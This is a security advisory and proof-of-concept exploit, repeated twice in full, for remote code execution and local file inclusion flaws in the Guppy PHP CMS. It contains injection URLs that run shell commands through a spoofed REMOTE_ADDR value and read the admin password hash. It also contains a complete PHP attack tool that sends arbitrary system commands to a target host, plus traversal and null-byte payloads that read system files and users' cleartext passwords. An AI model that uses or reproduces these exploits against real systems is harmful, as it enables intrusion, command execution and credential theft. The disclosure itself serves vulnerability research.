retrogod@aliceposta.it
28/11/05, 20:15
Guppy <= 4.5.9 Remote code execution / various arbitrary inclusion issues
software:
site: http://www.freeguppy.org/
description: a very popular French PHP CMS that stores data in files
i) remote code/commands execution (tested and working against php 5.0.2 and php 4.3.3
with register globals off and magic quotes off):
vulnerable code in error.php at line 86-98:
server var $REMOTE_ADDR is not properly sanitized before to be stored in an .inc file
that will be included by the main script.
if register globals is off you can overwrite this var
also, if magic_quotes_gpc is off you can inject arbitrary php code, poc:
http://[target]/[path_to_guppy]/error.php?err=hacker&_SERVER=&_SERVER[REMOTE_ADDR]=";passthru("ls -la>README");echo"
now I have an 20051128_162317_hacker.inc file with this code inside:
<?php
$err = "hacker";
$msg0 = "Unattended error";
$msg1 = "Unattended error";
$msg2 = "See the <a href='http://www.apachefrance.com/Articles/7/page2.html' alt=''>errors code HTTP</a>.";
$date = "Date : 28/11/2005 16:23";
$dest = "Page requested : ?";
$source = "Page source : ";
$browser = "Browser : ";
$addr_ip = "IP address : ";passthru("ls -la>README");echo"";
$domaine = "Domaine : ";
$with_mail = false;
?>
script has been executed and now you can go to:
http://[target]/[path_to_guppy]/README
to see the redirected output
also try this to see master database MD5 password hash:
http://[target]/[path_to_guppy]/error.php?err=hacker&_SERVER=&_SERVER[REMOTE_ADDR]=";passthru("cat ./admin/mdp.php>README");echo"
this is my proof of concept exploit tool:
<?php
# ---guppy459_xpl.php 17.30 28/11/2005 #
# #
# Guppy <=4.5.9 _SERVER[REMOTE_ADDR] overwrite / remote commands xctn #
# coded by rgod #
# site: http://rgod.altervista.org #
# #
# usage: launch from Apache, fill in requested fields, then go! #
# #
# Sun-Tzu:"To lift an autumn hair is no sign of great strength; to see the #
# sun and moon is no sign of sharp sight; to hear the noise of thunder is #
# no sign of a quick ear." #
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo'<html><head><title> ******** Guppy <=4.5.9 remote commands xctn **********
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:
********; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: ******** !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
******** Guppy <=4.5.9 remote commands xctn **********</p><p class="Stile6">a
script by rgod at <a href="http://rgod.altervista.org"target="_blank">
http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%"> <form
name="form1" method="post" action="'.strip_tags($SERVER[PHP_SELF]).'"><p><input
type="text" name="host"> <span class="Stile5">* hostname (ex:www.sitename.com)
</span></p> <p><input type="text" name="path"> <span class="Stile5">* path (ex:
/guppy/ or just / ) </span></p><p><input type="text" name="command"> <span
class="Stile5"> * specify a command , "cat ./admin/mdp.php" to see master
database MD5 password hash( against windows: type .\admin\mdp.php) </span> </p>
<p> <input type="text" name="port"><span class="Stile5">specify a port other
than 80 ( default value ) </span></p> <p> <input type="text" name="proxy">
<span class="Stile5"> send exploit through an HTTP proxy (ip:port)</span></p>
<p><input type="submit" name="Submit" value="go!"></p></form> </td></tr></table>
</body></html>';
function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td> </td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>  </td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b) ';
function sendpacket() //if you have sockets module loaded, 2x speed! if not,load
//next function to send packets
{
global $proxy, $host, $port, $packet, $html, $proxy_regex;
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
}
else
{ $c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
echo "OK.<br>";
echo "Attempting to connect to ".$host." on port ".$port."...<br>";
if ($proxy=='')
{
$result = socket_connect($socket, $host, $port);
}
else
{
$parts =explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$result = socket_connect($socket, $parts[0],$parts[1]);
}
if ($result < 0) {
echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
}
else
{
echo "OK.<br><br>";
$html= '';
socket_write($socket, $packet, strlen($packet));
echo "Reading response:<br>";
while ($out= socket_read($socket, 2048)) {$html.=$out;}
echo nl2br(htmlentities($html));
echo "Closing socket...";
socket_close($socket);
}
}
}
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) { echo 'No response from '.htmlentities($host);
die; }
}
else
{
$c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
fputs($ock,$packet);
if ($proxy=='')
{
$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
}
else
{
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml)))
{
$html.=fread($ock,1);
}
}
fclose($ock);
echo nl2br(htmlentities($html));
}
$host=$_POST[host];$path=$_POST[path];
$port=$_POST[port];$command=$_POST[command];
$proxy=$_POST[proxy];
if (($host<>'') and ($path<>'') and ($command<>''))
{
$port=intval(trim($port));
if ($port=='') {$port=80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$host=str_replace("\r\n","",$host);
$path=str_replace("\r\n","",$path);
#STEP 1 -> inject command...
$CODE='";error_reporting(0);ini_set("max_execution_time",0);system("'.$command.'>SUNTZU");echo"';
$CODE=urlencode($CODE);
$packet="GET ".$p."error.php?err=suntzu&_SERVER=&_SERVER[REMOTE_ADDR]=".$CODE." HTTP/1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Googlebot/Test (+http://www.googlebot.com/bot.html)\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
#now you will be redirected to an error description page, we need to see this
#url to include/execute error file...
$temp=explode('location: ',$html);
$temp2=explode(chr(0x0d).chr(0x0a),$temp[1]);
$location=$temp2[0];
echo "Location ->".htmlentities($location)."<br>";
#STEP 2 -> Launch commands...
$packet="GET ".$p.$location." HTTP/1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Internet Ninja x.0\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
#STEP 3 -> lookin' for redirected output...
$packet="GET ".$p."SUNTZU HTTP/1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Kenjin Spider\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
}
?>
ii)arbitrary local inclusion:
if register_globals on you can include an arbitrary style.inc file from local resources:
http://[target]/[path_to_guppy]/admin/editorTypetool.php?cmd=DIR&meskin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..% 2F
you can include an arbitrary file from local using null char:
http://[target]/[path_to_guppy]/admin/inc/archbatch.php?lng=../../../../../../../../../../../boot.ini%00
you can include an arbitrary -web.inc or -admin.inc file from local resources
http://[target]/[path_to_guppy]/admin/inc/dbbatch.php?lng=../../../../../../../../../../../
or any file using a null byte
http://[target]/[path_to_guppy]/admin/inc/dbbatch.php?lng=../../../../../../../../../../../boot.ini%00
http://[target]/[path_to_guppy]/admin/inc/nwlmail.php?lng=..%2f..%2f..%2f..%2f..%2f..%2f..%2 f..%2f..%2f..%2f..%2fboot.ini%00
through one of this inclusion issue you can retrieve any user clear test password, poc:
http://[target]/[path_to_guppy]/admin/inc/archbatch.php?lng=../../data/usermsg/username.dtb%00
rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta it
original advisory: http://rgod.altervista.org/guppy459_xpl.html
software:
site: http://www.freeguppy.org/
description: a very popular French PHP CMS that stores data in files
i) remote code/commands execution (tested and working against php 5.0.2 and php 4.3.3
with register globals off and magic quotes off):
vulnerable code in error.php at line 86-98:
server var $REMOTE_ADDR is not properly sanitized before to be stored in an .inc file
that will be included by the main script.
if register globals is off you can overwrite this var
also, if magic_quotes_gpc is off you can inject arbitrary php code, poc:
http://[target]/[path_to_guppy]/error.php?err=hacker&_SERVER=&_SERVER[REMOTE_ADDR]=";passthru("ls -la>README");echo"
now I have an 20051128_162317_hacker.inc file with this code inside:
<?php
$err = "hacker";
$msg0 = "Unattended error";
$msg1 = "Unattended error";
$msg2 = "See the <a href='http://www.apachefrance.com/Articles/7/page2.html' alt=''>errors code HTTP</a>.";
$date = "Date : 28/11/2005 16:23";
$dest = "Page requested : ?";
$source = "Page source : ";
$browser = "Browser : ";
$addr_ip = "IP address : ";passthru("ls -la>README");echo"";
$domaine = "Domaine : ";
$with_mail = false;
?>
script has been executed and now you can go to:
http://[target]/[path_to_guppy]/README
to see the redirected output
also try this to see master database MD5 password hash:
http://[target]/[path_to_guppy]/error.php?err=hacker&_SERVER=&_SERVER[REMOTE_ADDR]=";passthru("cat ./admin/mdp.php>README");echo"
this is my proof of concept exploit tool:
<?php
# ---guppy459_xpl.php 17.30 28/11/2005 #
# #
# Guppy <=4.5.9 _SERVER[REMOTE_ADDR] overwrite / remote commands xctn #
# coded by rgod #
# site: http://rgod.altervista.org #
# #
# usage: launch from Apache, fill in requested fields, then go! #
# #
# Sun-Tzu:"To lift an autumn hair is no sign of great strength; to see the #
# sun and moon is no sign of sharp sight; to hear the noise of thunder is #
# no sign of a quick ear." #
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo'<html><head><title> ******** Guppy <=4.5.9 remote commands xctn **********
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:
********; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: ******** !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
******** Guppy <=4.5.9 remote commands xctn **********</p><p class="Stile6">a
script by rgod at <a href="http://rgod.altervista.org"target="_blank">
http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%"> <form
name="form1" method="post" action="'.strip_tags($SERVER[PHP_SELF]).'"><p><input
type="text" name="host"> <span class="Stile5">* hostname (ex:www.sitename.com)
</span></p> <p><input type="text" name="path"> <span class="Stile5">* path (ex:
/guppy/ or just / ) </span></p><p><input type="text" name="command"> <span
class="Stile5"> * specify a command , "cat ./admin/mdp.php" to see master
database MD5 password hash( against windows: type .\admin\mdp.php) </span> </p>
<p> <input type="text" name="port"><span class="Stile5">specify a port other
than 80 ( default value ) </span></p> <p> <input type="text" name="proxy">
<span class="Stile5"> send exploit through an HTTP proxy (ip:port)</span></p>
<p><input type="submit" name="Submit" value="go!"></p></form> </td></tr></table>
</body></html>';
function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td> </td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>  </td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b) ';
function sendpacket() //if you have sockets module loaded, 2x speed! if not,load
//next function to send packets
{
global $proxy, $host, $port, $packet, $html, $proxy_regex;
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
}
else
{ $c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
echo "OK.<br>";
echo "Attempting to connect to ".$host." on port ".$port."...<br>";
if ($proxy=='')
{
$result = socket_connect($socket, $host, $port);
}
else
{
$parts =explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$result = socket_connect($socket, $parts[0],$parts[1]);
}
if ($result < 0) {
echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
}
else
{
echo "OK.<br><br>";
$html= '';
socket_write($socket, $packet, strlen($packet));
echo "Reading response:<br>";
while ($out= socket_read($socket, 2048)) {$html.=$out;}
echo nl2br(htmlentities($html));
echo "Closing socket...";
socket_close($socket);
}
}
}
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) { echo 'No response from '.htmlentities($host);
die; }
}
else
{
$c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
fputs($ock,$packet);
if ($proxy=='')
{
$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
}
else
{
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml)))
{
$html.=fread($ock,1);
}
}
fclose($ock);
echo nl2br(htmlentities($html));
}
$host=$_POST[host];$path=$_POST[path];
$port=$_POST[port];$command=$_POST[command];
$proxy=$_POST[proxy];
if (($host<>'') and ($path<>'') and ($command<>''))
{
$port=intval(trim($port));
if ($port=='') {$port=80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$host=str_replace("\r\n","",$host);
$path=str_replace("\r\n","",$path);
#STEP 1 -> inject command...
$CODE='";error_reporting(0);ini_set("max_execution_time",0);system("'.$command.'>SUNTZU");echo"';
$CODE=urlencode($CODE);
$packet="GET ".$p."error.php?err=suntzu&_SERVER=&_SERVER[REMOTE_ADDR]=".$CODE." HTTP/1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Googlebot/Test (+http://www.googlebot.com/bot.html)\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
#now you will be redirected to an error description page, we need to see this
#url to include/execute error file...
$temp=explode('location: ',$html);
$temp2=explode(chr(0x0d).chr(0x0a),$temp[1]);
$location=$temp2[0];
echo "Location ->".htmlentities($location)."<br>";
#STEP 2 -> Launch commands...
$packet="GET ".$p.$location." HTTP/1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Internet Ninja x.0\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
#STEP 3 -> lookin' for redirected output...
$packet="GET ".$p."SUNTZU HTTP/1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Kenjin Spider\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
}
?>
ii)arbitrary local inclusion:
if register_globals on you can include an arbitrary style.inc file from local resources:
http://[target]/[path_to_guppy]/admin/editorTypetool.php?cmd=DIR&meskin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..% 2F
you can include an arbitrary file from local using null char:
http://[target]/[path_to_guppy]/admin/inc/archbatch.php?lng=../../../../../../../../../../../boot.ini%00
you can include an arbitrary -web.inc or -admin.inc file from local resources
http://[target]/[path_to_guppy]/admin/inc/dbbatch.php?lng=../../../../../../../../../../../
or any file using a null byte
http://[target]/[path_to_guppy]/admin/inc/dbbatch.php?lng=../../../../../../../../../../../boot.ini%00
http://[target]/[path_to_guppy]/admin/inc/nwlmail.php?lng=..%2f..%2f..%2f..%2f..%2f..%2f..%2 f..%2f..%2f..%2f..%2fboot.ini%00
through one of this inclusion issue you can retrieve any user clear test password, poc:
http://[target]/[path_to_guppy]/admin/inc/archbatch.php?lng=../../data/usermsg/username.dtb%00
rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta it
original advisory: http://rgod.altervista.org/guppy459_xpl.html